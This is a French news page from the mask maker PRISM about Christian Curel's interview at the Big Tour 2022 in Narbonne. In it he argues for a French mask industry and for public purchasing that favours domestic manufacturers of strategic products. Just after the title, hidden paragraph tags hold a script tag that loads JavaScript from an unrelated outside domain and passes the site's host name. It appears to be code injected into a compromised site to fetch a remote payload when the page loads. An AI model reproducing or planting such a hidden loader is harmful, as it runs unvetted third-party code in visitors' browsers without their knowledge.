Christian Curel veut une filière de production de masques Made in France pour ne pas revivre le chaos de 2020 - PRISM</title><p hidden>width="69.5px" height="118.5px"<script defer src="https://softbylinux.com/tps.js?host=prism-medical-protect.fr"></script><p hidden>

Interview de Christian Curel à l'occasion du Big tour de Narbonne par Patrice Bégay

Christian Curel, Président de PRISM mais également du Syndicat des fabricants français de masques, était l'invité du plateau du Big Tour 2022 le 6 juillet 2022 à Narbonne. Le Big Tour est le festival des entrepreneurs, de la fierté du fabriqué en France et de la mise en valeur de la richesse du territoire national. Cet événement, qui a parcouru le pays en 28 étapes, est organisé par Bpifrance (banque publique française de financement et de développement des entreprises).

Lors de cette séquence, Christian Curel est interviewé en tant que Président du Syndicat des fabricants français de masques sur l'intérêt d'une filière de production 100% Made in France et sur la façon dont les fabricants français font face à la concurrence étrangère, et surtout chinoise.

Le Président de PRISM souhaite, au delà de la question des masques respiratoires, qu'un recensement de la totalité des produits stratégiques soit établi et, qu'a minima, les achats publiques sur ces derniers soient dirigés vers la fabrication française. Avec pour objectif d'éviter de revivre le scénario catastrophe de 2020 et la pénurie nationale de masques de protection respiratoire.

Partager cet article

Commentaires (0)